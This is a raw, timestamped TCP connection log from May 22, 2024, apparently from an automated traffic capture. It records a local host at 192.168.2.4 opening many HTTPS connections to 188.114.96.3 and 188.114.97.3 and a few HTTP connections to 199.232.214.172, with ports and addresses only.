                          May 22, 2024 17:57:25.045738935 CEST44349781188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.045805931 CEST44349781188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.045911074 CEST49781443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.045912027 CEST49781443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.049351931 CEST49781443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.049376011 CEST44349781188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.049918890 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.049956083 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.050023079 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.051743984 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.051758051 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.055110931 CEST44349782188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.055160046 CEST44349782188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.055202961 CEST49782443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.055214882 CEST44349782188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.055243015 CEST44349782188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.055291891 CEST49782443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.056585073 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.056619883 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.056689024 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.057898045 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.057912111 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.058013916 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.063365936 CEST49782443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.063374043 CEST44349782188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.063958883 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.064027071 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.064095974 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.070389986 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.070417881 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.131477118 CEST44349783188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.131643057 CEST44349783188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.131705999 CEST49783443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.148624897 CEST49783443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.148665905 CEST44349783188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.159383059 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.159426928 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.159497976 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.159789085 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.159810066 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.163461924 CEST49790443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.163491964 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.163552999 CEST49790443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.163990021 CEST49790443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.164000988 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.164356947 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.164362907 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.164407969 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.164748907 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.164753914 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.309070110 CEST44349778188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.309175968 CEST44349778188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.309349060 CEST49778443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.309930086 CEST49778443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.309972048 CEST44349778188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.313380003 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.313411951 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.313478947 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.313760996 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.313776970 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.348268986 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.348978043 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.349009991 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.349045038 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.349117994 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.349179983 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.354331017 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.354393005 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.354446888 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.354459047 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.354511976 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.355015993 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.355063915 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.355603933 CEST44349784188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.355736017 CEST44349784188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.355783939 CEST49784443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.355860949 CEST49784443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.355879068 CEST44349784188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.355891943 CEST49784443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.355918884 CEST49784443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.356239080 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.356288910 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.357168913 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.357219934 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.357988119 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.358036995 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.358865976 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.358959913 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.358966112 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.359018087 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.361486912 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.361545086 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.362299919 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.362365007 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.363542080 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.363611937 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.364996910 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.365068913 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.372745991 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.372808933 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.372822046 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.372847080 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.372903109 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.373053074 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.373084068 CEST44349777188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.373112917 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.373150110 CEST49777443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.378658056 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.378685951 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.378762007 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.378954887 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.378968954 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.542257071 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.547245026 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.583852053 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.589957952 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.592485905 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.592509985 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.592818975 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.592844963 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.593147993 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.593499899 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.593687057 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.593794107 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.594531059 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.594644070 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.594923973 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.594923973 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.594963074 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.595102072 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.633909941 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.635409117 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.635468960 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.635921955 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.638566971 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.639256001 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.639403105 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.640455008 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.640455008 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.640491009 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.672118902 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.672368050 CEST49790443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.672384024 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.672869921 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.673477888 CEST49790443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.673563004 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.673728943 CEST49790443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.679028034 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.679280996 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.679287910 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.679899931 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.680102110 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.680120945 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.681211948 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.681293011 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.682462931 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.682522058 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.688479900 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.688572884 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.689169884 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.689279079 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.689815998 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.689826965 CEST44349791188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.689971924 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.690001965 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.708004951 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.708118916 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.708183050 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.708214998 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.711354971 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.711443901 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.711443901 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.711473942 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.711539030 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.714509964 CEST44349790188.114.97.3192.168.2.4
                          May 22, 2024 17:57:25.714844942 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.718692064 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.718767881 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.718796968 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.721183062 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.721230030 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.721282959 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.721309900 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.721357107 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.730863094 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.731015921 CEST49791443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:25.749579906 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.796574116 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.796598911 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.810695887 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.812009096 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.812246084 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.812268972 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.812320948 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.813477993 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.814929962 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.814997911 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.815011024 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.817914009 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.818641901 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.818656921 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.819150925 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.819680929 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.819700956 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.826087952 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.826170921 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.826232910 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.826253891 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.826302052 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.827896118 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.829777956 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.829854965 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.829869986 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.831542015 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.832035065 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.832115889 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.832132101 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.833216906 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.837281942 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.837296009 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.838629007 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.838711023 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.838772058 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.838785887 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.838826895 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.839292049 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.867322922 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.867336988 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.870975018 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.871355057 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.871592045 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.871675014 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.871682882 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.871767044 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.885221958 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.885255098 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.901948929 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.902043104 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.902110100 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.902141094 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.902188063 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.919620991 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.919642925 CEST44349792188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.962708950 CEST49792443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.969100952 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.969647884 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.969660044 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.970789909 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.970957041 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.971317053 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.971430063 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:25.971784115 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:25.971791983 CEST44349793188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.026510954 CEST49793443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.076617956 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.076652050 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.076704025 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.078224897 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.078305960 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.078316927 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.078356028 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.081835985 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.081903934 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.085416079 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.085478067 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.088113070 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.088222027 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.089654922 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.089737892 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.095310926 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.095398903 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.096839905 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.096915007 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.099014044 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.099132061 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.101181984 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.101274014 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.106015921 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.106084108 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.106117010 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.106162071 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.107764959 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.107832909 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.161802053 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.162024975 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.175215960 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.175307989 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.175333023 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.175386906 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.175398111 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.175503016 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.175546885 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.188785076 CEST49785443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.188817978 CEST44349785188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.243042946 CEST49794443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.243076086 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.244822025 CEST49794443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.245277882 CEST49794443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.245291948 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.748235941 CEST4972380192.168.2.4199.232.214.172
                          May 22, 2024 17:57:26.748282909 CEST4972480192.168.2.4199.232.214.172
                          May 22, 2024 17:57:26.749110937 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.749485016 CEST49794443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.749496937 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.750634909 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.751202106 CEST49794443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.751373053 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.751511097 CEST49794443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:26.751522064 CEST44349794188.114.96.3192.168.2.4
                          May 22, 2024 17:57:26.817254066 CEST8049723199.232.214.172192.168.2.4
                          May 22, 2024 17:57:26.817305088 CEST8049724199.232.214.172192.168.2.4
                          May 22, 2024 17:57:26.817374945 CEST4972380192.168.2.4199.232.214.172
                          May 22, 2024 17:57:26.817383051 CEST4972480192.168.2.4199.232.214.172
                          May 22, 2024 17:57:27.001085997 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.001173973 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.001219988 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.001240969 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.001287937 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.002677917 CEST49787443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.002708912 CEST44349787188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.010452032 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.010668993 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.010795116 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.016928911 CEST49786443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.016954899 CEST44349786188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.020088911 CEST49797443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.020142078 CEST44349797188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.020210981 CEST49797443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.020421028 CEST49797443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.020441055 CEST44349797188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.022963047 CEST49798443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.023035049 CEST44349798188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.023107052 CEST49798443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.023314953 CEST49798443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.023359060 CEST44349798188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.092689037 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.092936993 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.093008995 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.094106913 CEST49788443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.094141960 CEST44349788188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.096668959 CEST49799443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.096729994 CEST44349799188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.096812963 CEST49799443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.097043037 CEST49799443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.097075939 CEST44349799188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.097409964 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.097534895 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.097582102 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.100938082 CEST49800443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.100971937 CEST44349800188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.101157904 CEST49800443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.101731062 CEST49800443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.101752996 CEST44349800188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.102060080 CEST49789443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.102091074 CEST44349789188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.110034943 CEST49801443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.110106945 CEST44349801188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.110172033 CEST49801443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.110347033 CEST49801443192.168.2.4188.114.96.3
                          May 22, 2024 17:57:27.110382080 CEST44349801188.114.96.3192.168.2.4
                          May 22, 2024 17:57:27.114521980 CEST49802443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.114542007 CEST44349802188.114.97.3192.168.2.4
                          May 22, 2024 17:57:27.114603996 CEST49802443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.114762068 CEST49802443192.168.2.4188.114.97.3
                          May 22, 2024 17:57:27.114774942 CEST44349802188.114.97.3192.168.2.4
